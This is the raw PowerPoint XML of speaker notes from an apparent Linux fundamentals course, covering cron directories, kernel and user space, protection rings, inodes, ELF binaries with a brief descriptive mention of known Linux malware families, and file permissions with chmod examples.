            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>crontabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in subdirectories for users. </a:t>
            </a:r>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18378671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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598841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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review slide. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stats are from 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://hostingtribunal.com/blog/linux-statistics/#gref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfr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know that operating systems all execute their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in an elevated system state compared to normal user applications. This elevated system state is protected and restricted memory that is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>space to prevent the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from terminating and crashing the system. When a user runs an application or tool, that application or tool executes in what is called user space. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user space sees a subset of the machines available resources and performs certain system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functions. When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code, the system is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mode. When running a regular process, the system is in user space executing in user mode. This distinction is critical. Applications can come from a variety of sources, may be poorly developed or originate unknown sources (i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>., bad guys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). By running these applications separate from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>space, it makes it more difficult for bad guys to tamper with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>resources and cause the system to panic (crash).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40667016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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pace can be just as effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for an adversary, if they have the correct permissions to collect or conduct the intended action. User space is the portion of memory in which user processes run. The user processes are instances of all programs other than the Kernel, which consist of both utility and application programs. When a program is to be run, it is copied from storage into user space, so it can be accessed at high speed by the CPU. The division of user space and Kernel space is vital to both system stability and security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528135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Kernel space is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> where the Kernel executes and provides its services. Kernel space can be accessed by user processes only through the use of system calls. System calls are requests by active process for a service performed by the Kernel, such as the input/output or process creation. Kernel space will operate at Run 0 or Kernel mode for the protection rings that will be seen on the next slide. The division of user space and Kernel space is vital to both system stability and security. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36278672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recall from OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> academics from college or UCT, protections ring 0 through ring 3 were covered. Ring 0 being the most privileged (Kernel) and ring 3 being the least privileged (user space). Ring 1 and ring 2 were used as a means to provided elevated privileges for device drivers or OS utilities, particularly in x86 architectures. In Linux, only ring 0 and ring 3 are used.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26307200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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33880926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smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6227763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Linux file or directory (from a technical point-of-view, there is no real difference between them) has an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> contains all of the file’s metadata (i.e., all the administrative data needed to read a file is stored in its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>). A filename is a casually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> assigned label that can be changed, but the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is unique to the file and remains the same as long as the file exists.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> contains a list of all the blocks in which a file is stored, the owner information for that file, permissions and all other attributes for the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> limits is per file system and is decided at file system creation time. The maximum directory size is dependent on the file system and thus the exact limit differs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> backdoors, Trojans and attacks are compiled as an ELF binary or the ELF binaries are the victim of process injection which makes having a basic understanding of ELF valuable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>From the MITRE Matrix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Exaramel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>HiddenWasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statistically linked ELF binary with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>stdlibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pupy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Xbash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are a couple more examples.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15030263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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21774238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A user is the owner of the file. By default, the person who created a file becomes the owner. Hence, a user is also sometimes called an owner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Group: A user-group can contain multiple users. All users belonging to a group will have the same access permissions to the file. Suppose you have a project where a number of people require access to a file. Instead of manually assigning permissions to each user, you could add all users to a group, and assign a group permission to the file (such that only this group’s members and no one else can read or modify the files).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All: Any other user who has access to a file. This person has neither created the file, nor does he belong to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usergroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> who could own the file. Practically, it means everybody else. Hence, when you set the permission for all, it is also referred as set permissions for the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read: This permission gives you the authority to open and read a file. Read permission on a directory gives you the ability to lists its contents.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued on next page).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42273092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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued from previous page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write: The write permission gives you the authority to modify the contents of a file. The write permission on a directory gives you the authority to add, remove and rename files stored in the directory. Consider a scenario where you have to write permission on file, but do not have write permission on the directory where the file is stored. You will be able to modify the file contents. But you will not be able to rename, move or remove the file from the directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute: In Windows, an executable program usually has an extension ‘.exe’ and which you can easily run. In Unix/Linux, you cannot run a program unless the execute permission is set. If the execute permission is not set, you might still be able to see/modify the program code (provided read and write permissions are set), but it will not run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3082389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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfr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a quick review of how one can view permissions in Linux. Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>permissions is needed for future missions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What command lists permissions? Surprise or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not… it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the screen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the first line output, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘-’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a file type. The next three characters will follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘user’, ‘group’, ‘all’. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So Helloworld.txt has the following security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User, happens to show root, can read/write, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second item is a directory shown by the ‘d’ at the beginning. This is showing the user can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>read/write/execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can read/execute and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can read/execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the lesson will review </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>how to change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>permissions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can change permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ways. Absolute mode or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>symbolic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13194287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Chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> use absolute codes off the table, which are octal values or number values for file permissions composed of 3 digits or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>4 digits. The numbers will follow the user/group/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>context. These octal values can be used to change or manage a file or directory permission with a utility such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 754 Helloworld.txt will modify the permissions of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> text file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Users:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ead/write/execute since it starts with a ‘7’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Group: Read/execute since middle character is a ‘5’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All: Read only since third character is a ‘4’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1472662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Symbolic mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the other mode in which you can change permission with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> using symbolic values. Here you can see the denotations and operator symbols needed to make it happen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The first command changes the group ‘g’ permissions to Helloworld.txt by adding ‘w’ write permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The second command removes all permissions for everyone. </a:t>
            </a:r>
